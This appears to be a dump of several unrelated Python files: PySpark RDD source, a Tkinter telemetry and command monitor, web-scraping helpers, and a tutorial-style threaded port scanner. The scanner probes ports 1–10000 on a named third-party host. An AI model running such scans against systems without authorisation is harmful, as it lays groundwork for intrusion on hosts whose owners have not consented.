for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
        L{zipWithIndex}.
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self):
""" Return a JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
`"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available here
<http://dx.doi.org/10.1145/2452376.2452456>`_.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(self._jrdd.rdd())
return _load_from_socket(port, self._jrdd_deserializer)
def _prepare_for_python_RDD(sc, command):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
# The broadcast will have same life cycle as created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
broadcast_vars = [x._jbroadcast for x in sc._pickled_broadcast_vars]
sc._pickled_broadcast_vars.clear()
return pickled_command, broadcast_vars, sc.environment, sc._python_includes
def _wrap_function(sc, func, deserializer, serializer, profiler=None):
assert deserializer, "deserializer should not be empty"
assert serializer, "serializer should not be empty"
command = (func, profiler, deserializer, serializer)
pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command)
return sc._jvm.PythonFunction(bytearray(pickled_command), env, includes, sc.pythonExec,
sc.pythonVer, broadcast_vars, sc._javaAccumulator)
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
wrapped_func = _wrap_function(self.ctx, self.func, self._prev_jrdd_deserializer,
self._jrdd_deserializer, profiler)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(), wrapped_func,
self.preservesPartitioning)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
cmd_telm_monitor.py
|
#!/usr/bin/env python
import matplotlib
matplotlib.use('TkAgg')
from numpy import arange, sin, pi
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
from matplotlib.figure import Figure
from Tkinter import *
import sys
import threading
import Queue
import os
import math
import Pmw
import struct
import math
import time
from fprime_gds.gse.controllers import client_sock
#import ModeMgrSm
class Plotter:
"""
    Class to accept telemetry from multiple partitions and send commands.
It also launches thread to generate fake simulation data.
"""
def __init__(self, master, width=500, height=350):
"""
Constructor
"""
self.root = master
# Title
self.status = Label(master, text="Multi-Partition Telemetry & Commander", justify=LEFT)
self.status.pack(side=TOP)
# Entry fields to support commands
self.control3 = Frame(master)
self.control3.pack(side=BOTTOM, fill=X, padx=2)
# Buttons to launch demos
self.control2 = Frame(master)
self.control2.pack(side=BOTTOM, fill=X, padx=2)
# Buttons to launch demos
self.control = Frame(master)
self.control.pack(side=BOTTOM, fill=X, padx=2)
# Build temp plot here for testing
self.fig = Figure(figsize=(6,3), dpi=100)
self.axis = self.fig.add_subplot(111)
t = arange(0.0,3.0,0.01)
s = sin(2*pi*t)
t=[]
s=[]
# Initialize plots
self.axis.plot(t,s)
# Label title, axis and turn on grid
self.label_plot()
# a tk.DrawingArea
canvas = FigureCanvasTkAgg(self.fig, master=master)
canvas.show()
canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1)
#
toolbar = NavigationToolbar2TkAgg( canvas, master )
toolbar.update()
canvas._tkcanvas.pack(side=TOP, fill=BOTH, expand=1)
#
self.display = Pmw.ScrolledText(self.root, hscrollmode='dynamic',
vscrollmode='dynamic', hull_relief='sunken',
hull_background='gray40', hull_borderwidth=10,
text_background='white', text_width=16,
text_foreground='black', text_height=10,
text_padx=10, text_pady=10, text_relief='groove',
text_font=('arial', 12, 'bold'))
self.display.pack(side=TOP, expand=YES, fill=BOTH)
self.display.tag_config('ans', foreground='red')
self.display.tag_config('blue', foreground='blue')
self.display.tag_config('red', foreground='red')
self.display.tag_config('green', foreground='green')
self.display.tag_config('black', foreground='black')
# Quit
self.quit_bt = Button(self.control, text='Quit', activebackground="pink", command=self.quit)
self.quit_bt.pack(side=LEFT, fill=X, expand=True)
# Connect
self.connect_bt = Button(self.control, text='Connect', activebackground="pink", command=self.connect)
self.connect_bt.pack(side=LEFT, fill=X, expand=True)
# Clear
self.clear_bt = Button(self.control, text='Clear', activebackground="pink", command=self.clear)
self.clear_bt.pack(side=LEFT, fill=X, expand=True)
# Play
self.play_bt = Button(self.control, text='List', activebackground="pink", command=self.list)
self.play_bt.pack(side=LEFT, fill=X, expand=True)
# Pause
self.pause_bt = Button(self.control, text='Play', activebackground="pink", command=self.play)
self.pause_bt.pack(side=LEFT, fill=X, expand=True)
# Stop
self.stop_bt = Button(self.control, text='Stop', activebackground="pink", command=self.stop)
self.stop_bt.pack(side=LEFT, fill=X, expand=True)
# opcode 1
self.op1_bt = Button(self.control2, text='Mode Change', activebackground="pink", command=self.op1)
self.op1_bt.pack(side=LEFT, fill=X, expand=True)
# opcode 2
self.op2_bt = Button(self.control2, text='Set Param', activebackground="pink", command=self.op2)
self.op2_bt.pack(side=LEFT, fill=X, expand=True)
# opcode 3
self.op3_bt = Button(self.control2, text='Get Param', activebackground="pink", command=self.op3)
self.op3_bt.pack(side=LEFT, fill=X, expand=True)
# opcode 4
self.op4_bt = Button(self.control2, text='Test Cent. (x,y)', activebackground="pink", command=self.op4)
self.op4_bt.pack(side=LEFT, fill=X, expand=True)
# opcode 5
self.op5_bt = Button(self.control2, text='Test ARS Data', activebackground="pink", command=self.op5)
self.op5_bt.pack(side=LEFT, fill=X, expand=True)
#
# Entry fields to support command.
#
self.mode_signal = 1
self.signals = ["OnCmd", "OffCmd", "ARS_On", "ARS_Off", "Centroid_On", "Centroid_Off",
"Show_SM_GUI", "Hide_SM_GUI"]
self.mode_entry = Pmw.ComboBox(self.control3,
scrolledlist_items=self.signals,
selectioncommand = self.changeMode)
self.mode_entry.pack(side=LEFT, fill=X, expand=False)
self.mode_entry.selectitem(0, setentry = 1)
self.mode_entry.component("entryfield").configure(validate=self.validateMode)
#
self.set_param = Pmw.EntryField(self.control3, value=1.0,
validate='real')
self.set_param.pack(side=LEFT, fill=X, expand=False)
#
self.get_param = Pmw.EntryField(self.control3, value="Params",
validate='alphanumeric')
self.get_param.pack(side=LEFT, fill=X, expand=False)
#
self.test_cent = Pmw.EntryField(self.control3, value='0 0',
validate=self.cent_coord_validate)
self.test_cent.pack(side=LEFT, fill=X, expand=False)
self.cent_coord_validate_ok = True
#
self.test_ars = Pmw.EntryField(self.control3, value='0.0 0.0 0.0',
validate=self.ars_validate)
self.test_ars.pack(side=LEFT, fill=X, expand=False)
self.ars_validate_ok = True
#
# Socket when connection established
#
self.sock = None
# Store thread here
self.thread = threading.Thread()
self.thread2 = threading.Thread()
# Instance a lock and make all socket read/write atomic
self.lock = threading.Lock()
# Create Queue for telemetry here
self.queue = Queue.Queue()
# Create Queue for simulation data here
self.queue2 = Queue.Queue()
# Define plot format for each instance here
# Note that instance id is index to list
# Note: Adding a "-" results in lines in replot only.
self.plot_fmt = []
self.plot_fmt.append("ro")
self.plot_fmt.append("g^")
self.plot_fmt.append("c<")
self.plot_fmt.append("m>")
#
self.i = 0
#
width = 600
height = 600
x = 500
y = 500
# self.mode_mgr_sm_win = ModeMgrSm.ModeMgrSm("ModeMgrSm", big_name="Mode Manager State Machine", size=16)
# self.mode_mgr_sm_win.win.geometry("%dx%d+%d+%d" % (width, height, x, y))
# self.mode_mgr_sm_win.win.withdraw()
def cent_coord_validate(self, text):
"""
Check that entry is (x y) where x and y are integer.
"""
self.cent_coord_validate_ok = False
if len(text.split(" ")) != 2:
return Pmw.PARTIAL
x,y = text.split(" ")
if not x.isdigit():
return Pmw.PARTIAL
if not y.isdigit():
return Pmw.PARTIAL
self.cent_coord_validate_ok = True
return Pmw.OK
def ars_validate(self, text):
"""
Check that entry is (x y z) where x, y, z are float.
"""
self.ars_validate_ok = False
if len(text.split(" ")) != 3:
return Pmw.PARTIAL
x,y,z = text.split(" ")
xp = x.partition(".")
if not (xp[0].isdigit() and xp[1]=='.' and xp[2].isdigit()):
return Pmw.PARTIAL
yp = y.partition(".")
if not (yp[0].isdigit() and yp[1]=='.' and yp[2].isdigit()):
return Pmw.PARTIAL
zp = z.partition(".")
if not (zp[0].isdigit() and zp[1]=='.' and zp[2].isdigit()):
return Pmw.PARTIAL
self.ars_validate_ok = True
return Pmw.OK
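    # Added note (not part of the original source): Pmw invokes these
    # validators as the user types, so incomplete input returns Pmw.PARTIAL
    # while a fully formed entry returns Pmw.OK, e.g.
    #   self.cent_coord_validate("10 20")    -> Pmw.OK
    #   self.ars_validate("0.1 0.2 0.3")     -> Pmw.OK
    #   self.ars_validate("0.1 0.2")         -> Pmw.PARTIAL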
def set_demo_lim(self):
"""
Set axis limits for long trajectory demo.
"""
self.axis.set_xlim(0.0, 50.0)
#self.axis.set_ylim(-1.25, 1.25)
self.axis.set_ylim(-50.0, 50.0)
def set_auto_lim(self):
"""
Set autoscale of axis
"""
self.axis.relim()
self.axis.autoscale_view(True,True,True)
def label_plot(self):
"""
Refresh plot labels and settings
"""
self.axis.grid()
self.axis.set_title("Notional Tip/Tilt Position Update")
self.axis.set_ylabel("Tip/Tilt (radians)")
self.axis.set_xlabel("N (counts)")
# Set default xy axis
self.set_demo_lim()
# Button row 1 functionality here...
def list(self):
self.root.update_idletasks()
if self.sock != None:
self.lock.acquire()
self.sock.send("List\n")
self.lock.release()
else:
self.status.config(text="SOCKET NOT CONNECTED TO SERVER...", fg="red")
def play(self):
self.root.update_idletasks()
if self.sock != None:
self.queue2.put("PLAY")
self.display.insert(END, "Sent PLAY request to sim thread...\n", "green")
else:
self.status.config(text="SOCKET NOT CONNECTED TO SERVER...", fg="red")
def stop(self):
self.root.update_idletasks()
if self.sock != None:
self.queue2.put("STOP")
self.display.insert(END, "Sent STOP request to sim thread...\n", "green")
else:
self.status.config(text="SOCKET NOT CONNECTED TO SERVER...", fg="red")
# Button row 2 functionality here...
def app_cmd(self, msg):
"""
Package command for server to send to APP
"""
if self.sock != None:
cmd = "A5A5 " + "APP " + msg
self.lock.acquire()
self.sock.send(cmd)
self.lock.release()
else:
self.status.config(text="SOCKET NOT CONNECTED TO SERVER...", fg="red")
def app_cmd_fmt(self, op,s1,i1,i2,f1,f2):
"""
Packet format for basic command
"""
n = 0
l = 80
fmt = "Message sent: (%d,%s,%d,%d,%d,%f,%f,%d)\n"
msg = struct.pack(">I80s3i",op,s1,l,i1,i2) + struct.pack("2f",f1,f2) + struct.pack(">i",n)
print fmt % (op,s1,l,i1,i2,f1,f2,n)
self.display.insert(END, fmt % (op,s1,l,i1,i2,f1,f2,n), "black")
self.display.see(END)
return msg
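    # Added note (not part of the original source): the packed command is
    # 4 (">I" opcode) + 80 ("80s" string) + 12 ("3i" length plus two ints)
    # + 8 ("2f" two native-order floats) + 4 (">i" trailing id) = 108 bytes,
    # which matches the fixed 108-byte messages built by op4/op5 below.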
def op1(self):
"""
Execute op 1 command
"""
val = int(self.mode_signal)
msg = self.app_cmd_fmt(1, "", val, 0, 0.0, 0.0)
self.app_cmd(msg)
def changeMode(self, text):
"""
Set the mode manager mode, or hide/show mode mgr display
"""
item = self.mode_entry.getvalue()[0]
if item == "Show_SM_GUI":
self.mode_signal = 1
self.mode_mgr_sm_win.win.deiconify()
self.mode_mgr_sm_win.win.lift(self.root)
elif item == "Hide_SM_GUI":
self.mode_signal = 1
self.mode_mgr_sm_win.win.withdraw()
elif item.isdigit():
self.mode_signal = int(item)
else:
self.mode_signal = self.signals.index(item) + 1
# print self.mode_signal
def validateMode(self, text):
"""
Validate mode is in the list or a number of 1 to 6 here.
"""
if text in self.signals:
return Pmw.OK
if text.isdigit():
if 0 < int(text) < 7:
return Pmw.OK
return Pmw.PARTIAL
def op2(self):
val = float(self.set_param.getvalue())
msg = self.app_cmd_fmt(2, "", 0, 0, val, 0.0)
self.app_cmd(msg)
def op3(self):
val = self.get_param.getvalue()
msg = self.app_cmd_fmt(3, val, 0, 0, 0.0, 0.0)
self.app_cmd(msg)
def op4(self):
"""
Send x, y and increment each time...
"""
if self.cent_coord_validate_ok:
val = self.test_cent.getvalue().split(" ")
n = 1
x = int(val[0])
y = int(val[1])
msg = struct.pack(">3i",x,y,n)
#
# Make msg 108 bytes like command
buf = 96*"A5"
msg = struct.pack(">96s",buf) + msg
self.app_cmd(msg)
self.display.insert(END, "opcode=%d, Coord=(%d,%d)\n" % (n,x,y),"black")
self.display.see(END)
def op5(self):
"""
Send x, y, z and increment each fractionally...
"""
if self.ars_validate_ok:
c = self.test_ars.getvalue().split(" ")
n = 2
f1 = float(c[0])
f2 = float(c[1])
f3 = float(c[2])
msg = struct.pack("3f",f1,f2,f3) + struct.pack(">i",n)
#
# Make msg 108 bytes like command
buf = 92*"A5"
msg = struct.pack(">92s",buf) + msg
self.app_cmd(msg)
self.display.insert(END, "opcode=%d, Angles=(%f,%f,%f)\n" % (n,f1,f2,f3),"black")
self.display.see(END)
def quit(self):
"""
Quit the plotter
"""
self.clear()
        self.root.quit()
        self.root.destroy()
def receive_telemetry(self, sock):
"""
Receive telemetry by first reading 4 byte size,
then reading size bytes of serial telemetry
and returning it as a message.
"""
msg = sock.recv(4)
size = int(struct.unpack("i",msg)[0])
data = sock.recv(size)
return data
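    # Illustrative sketch of the expected sender side (assumption, not part
    # of the original source): the server prefixes each telemetry payload
    # with its native-order 4-byte length, e.g.
    #   payload = struct.pack("3f", x, y, z) + struct.pack(">i", 1)
    #   sock.send(struct.pack("i", len(payload)) + payload)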
def enqueue_output(self, sock, queue):
"""
Queue up socket telemetry for TK processing
"""
while 1:
try:
#x = sock.receive()
x = self.receive_telemetry(sock)
queue.put(x)
except RuntimeError:
queue.put("terminate")
print "Socket connection terminated"
break
return
def enqueue_sim_output(self, sock, queue):
"""
Queue up socket sim ARS data for C++ app commanding
"""
angle = 0.0
while 1:
try:
msg = queue.get()
if msg == "PLAY":
while 1:
# Update rate is 2 hz.
time.sleep(0.5)
# Compute x, y, z sin phased by 45 degree each
P = 45.0 * (math.pi/180.0)
# Phase
G = 1.0
# Angle sin values
x = G * math.sin(angle)
y = G * math.sin(angle + P)
z = G * math.sin(angle + 2*P)
# Angle increment value
angle += 10.0 * (math.pi/180.0)
#print time.time(), x, y, z
n = 2
msg = struct.pack("3f",x,y,z) + struct.pack(">i",n)
#
# Make msg 108 bytes like command
buf = 92*"A5"
msg = struct.pack(">92s",buf) + msg
#
self.app_cmd(msg)
if not queue.empty():
msg = queue.get()
print msg
if msg == "STOP":
angle = 0.0
break
elif msg == "STOP":
pass
elif msg == "RESET":
pass
else:
pass
except RuntimeError:
queue.put("terminate")
print "Socket connection terminated"
break
def connect(self):
"""
Connect to TRN filter state telemetry socket
and start listener thread.
"""
if self.thread.isAlive() == True:
print "LISTENER THREAD IS ALIVE!"
return
# connect to server TRN
try:
port = 50007
server = "127.0.0.1"
str = "Connected to server (host addr %s, port %d)" % (server, port)
self.sock=client_sock.ClientSocket(server,port)
#
# Register the GUI with the server
self.lock.acquire()
self.sock.send("Register GUI\n")
self.lock.release()
except IOError:
str = "EXCEPTION: Could not connect to socket at host addr %s, port %s" % (server, port)
# update status
self.status.config(text=str, fg="red")
self.connect_bt.config(text="Disconnected", fg="black")
self.sock = None
return
if self.thread.daemon == False:
# create background listener thread
self.thread = threading.Thread(target=self.enqueue_output, args=(self.sock, self.queue))
# thread dies with the program
self.thread.daemon = True
# state listener thread here
self.thread.start()
if self.thread2.daemon == False:
# create background sim data generator thread
self.thread2 = threading.Thread(target=self.enqueue_sim_output, args=(self.sock, self.queue2))
# thread dies with the program
self.thread2.daemon = True
# start simulation thread here
self.thread2.start()
# update status
self.status.config(text=str, fg="red")
self.connect_bt.config(text="Connected", fg="red")
def clear(self):
"""
Clear all plots
"""
#if self.thread.isAlive() == True:
# self.status.config(text="LISTENER THREAD IS ALIVE!",fg="red")
# return
self.i = 0
self.axis.cla()
self.label_plot()
self.fig.canvas.draw()
self.status.config(text="Cleared plot areas.",fg="black")
self.fig.canvas.draw()
self.display.clear()
def updatePlots(self, n, x, y):
"""
Update plot with new point
"""
fmt = self.plot_fmt[0]
fmt2 = self.plot_fmt[1]
if n % 50.0 == 0:
self.axis.set_xlim(n, n+50.0)
self.axis.plot(n,x,fmt)
self.axis.plot(n,y,fmt2)
#
# Update figure here
self.fig.canvas.draw()
def decode_telm(self, bmsg):
"""
Decode APP telemetry here and return a tuple.
"""
if bmsg[:4] == "List":
bmsg = bmsg.split(" ")
print "---Server connected to %s" % bmsg[1]
self.display.insert(END, "---Server connected to %s\n" % bmsg[1], "blue")
return []
l = len(bmsg)
msg = struct.unpack(">" + "%d" % l + "s",bmsg)
#print msg
#tid = struct.unpack(">i",msg[0][-5:-1])[0]
tid = struct.unpack(">i",msg[0][-4:])[0]
if tid == 1:
args = struct.unpack("3f",msg[0][:-4])
print "--- (raw tlm ARSDATA) %f, %f, %f\n" % args
self.display.insert(END, "--- (raw tlm ARSDATA) %f, %f, %f\n" % args, "ans")
l = [tid, args[0],args[1],args[2]]
elif tid == 2:
args = struct.unpack("2f",msg[0][:-4])
print "--- (raw tlm FSMDATA) %f, %f\n" % args
self.display.insert(END, "--- (raw tlm FSMDATA) %f, %f\n" % args, "ans")
l = [tid, args[0],args[1]]
elif tid == 3:
args = struct.unpack("f",msg[0][:-4])
print "--- (raw tlm PARAMDATA) %f\n" % args[0]
self.display.insert(END, "--- (raw tlm PARAMDATA) %f\n" % args, "ans")
l = [tid, args[0]]
elif tid == 4:
m = msg[0][0:80]
args = struct.unpack("80s",m)
print "--- (State Data) %s\n" % args
self.display.insert(END, "--- (State Data) %s\n\n" % args, "ans")
self.display.insert(END, "\n")
l = [tid, args]
else:
print "Unrecognized telemetry id = %d\n" % tid
self.display.insert(END, "ERROR: Unrecognized telemetry id = %d\n" % tid, "ans")
l = []
self.display.see(END)
#print "Id is %d, msg is %s, args is %s" % (tid,msg,args)
return l
def update_task(self):
"""
Update telemetry and plots from socket here...
"""
time_period = 20
time_period_no_output = 200
# read line without blocking
try:
msg = self.queue.get_nowait()
#print msg
msg = self.decode_telm(msg)
if len(msg) > 0:
if msg[0] == 2:
n = self.i
x = msg[1]
y = msg[2]
self.updatePlots(n, x, y)
self.i += 1
if msg[0] == 4:
state = msg[1][0].split(":")
e = state[1].split(" ")[-1].strip("\x00")
s1 = state[0]
s2 = state[1].strip(" "+e).replace(" ","")
s2 = s2.strip("\x00")
s2 = s2.strip("ENTRY")
s2 = s2.strip("EXIT")
state = s2 + ":" + s1
#
if e == "EXIT":
self.mode_mgr_sm_win.ExitState(state)
if e == "ENTRY":
self.mode_mgr_sm_win.EnterState(state)
#
except Queue.Empty:
#print('no output yet')
self.root.after(time_period_no_output, self.update_task)
return
# ... do something with line
#
        if hasattr(self, 'mode_mgr_sm_win'):
            self.mode_mgr_sm_win.win.update_idletasks()
self.root.update_idletasks()
self.root.after(time_period, self.update_task)
return
if __name__ == '__main__':
root = Tk()
root.option_add('*Font', 'Verdana 10')
    root.title('Multi-Partition Demo Commander and Telemetry Monitor')
p = Plotter(root)
root.after(200, p.update_task)
root.mainloop()
|
utils.py
|
import requests
import ConfigParser
from bs4 import BeautifulSoup
from time import sleep
from clint.textui import progress
import os, sys, itertools
from threading import Thread
from logs import *
def ip_address():
"""
Gets current IP address
"""
response = requests.get('http://www.ip-addr.es')
print '[-] GET {0} | {1}'.format(response.status_code, response.url)
log_info('[+] ip address is: {0}'.format(response.text.strip()))
def config_file(path):
"""
Reads configuration file
"""
if not os.path.exists(path):
raise IOError('file not found!')
log_info('[+] configuration file: {0}'.format(path))
config = ConfigParser.ConfigParser()
config.read(path)
return config
def make_soup(response, debug=False):
"""
Makes soup from response
"""
print '[*] fetching url... {0} | {1}'.format(response.status_code, response.url)
soup = BeautifulSoup(response.text, 'html5lib')
if debug:
print soup.prettify().encode('utf-8')
return soup
def wait(delay):
if delay > 0:
print '[-] going to sleep {0} seconds'.format(delay)
sleep(delay)
def download_file(r, url, directory, filename):
"""
Downloads file with progress bar
"""
if not os.path.exists(directory):
# creates directories recursively
os.makedirs(directory)
log_info('[+] created new directory: ' + directory)
filename = filename.replace(':', '-')
path = os.path.join(directory, filename)
print '[-] downloading file from url: {0}'.format(url)
response = r.get(url, stream=True)
with open(path, 'wb') as f:
total_length = int(response.headers.get('content-length'))
for chunk in progress.bar(response.iter_content(chunk_size=1024), expected_size=(total_length/1024) + 1):
if chunk:
f.write(chunk)
f.flush()
log_success('[+] new download: {0}'.format(path))
return path
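# Illustrative usage sketch (added comment, not part of the original source);
# the URL and paths below are placeholders:
#   session = requests.Session()
#   download_file(session, 'http://example.com/archive.zip', 'downloads', 'archive.zip')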
def thread_loader(function):
"""
Starts a thread with loading bar
"""
thread = Thread(target=function)
thread.start()
spinner = itertools.cycle(['-', '/', '|', '\\'])
while thread.is_alive():
sys.stdout.write(spinner.next())
sys.stdout.flush()
# erase the last written char
sys.stdout.write('\b')
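# Illustrative usage sketch (added comment, not part of the original source):
# the spinner animates on stdout until the wrapped function returns:
#   def long_task():
#       sleep(5)
#   thread_loader(long_task)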
|
threaded_portscan.py
|
"""Scan ports."""
import socket
import threading
from queue import Queue
host = 'pythonprogramming.net'
def portscan(host, port):
"""Scan ports."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # connect() returns None, so close the socket itself when finished
        s.connect((host, port))
        print('>>>', port, 'is open')
    except Exception:
        pass
    finally:
        s.close()
# print('...', port)
def threader():
"""Thread generator."""
while True:
worker = q.get()
portscan(host, worker)
q.task_done()
q = Queue()
for x in range(100):
t = threading.Thread(target=threader)
t.daemon = True
t.start()
for worker in range(1, 10001):
q.put(worker)
q.join()
"""
... 27
... 26
... 24
... 23
... 19
... 8
... 17
... 18
... 4
... 13
... 9
... 7
... 20
... 14
... 10
Port 22 is open
... 22
... 5
... 21
... 15
... 11
... 16
... 28
... 12
... 2
... 3
... 6
... 25
... 1
... 29
... 30
... 31
... 41
... 39
... 37
... 40
... 36
... 35
... 34
... 38
... 52
... 50
... 42
... 47
... 51
... 49
... 55
... 44
... 54
... 33
... 45
... 56
... 48
... 32
... 46
... 43
... 53
... 57
... 58
... 59
... 60
... 72
... 68
... 71
... 70
... 67
... 66
... 69
... 64
... 65
Port 80 is open
... 80
... 62
... 63
... 81
... 77
... 76
... 75
... 78
... 86
... 82
... 74
... 84
... 79
... 83
... 85
... 73
... 87
... 61
... 88
... 89
... 90
... 93
... 92
... 91
... 96
... 95
... 98
... 94
... 97
... 100
... 99
"""
|
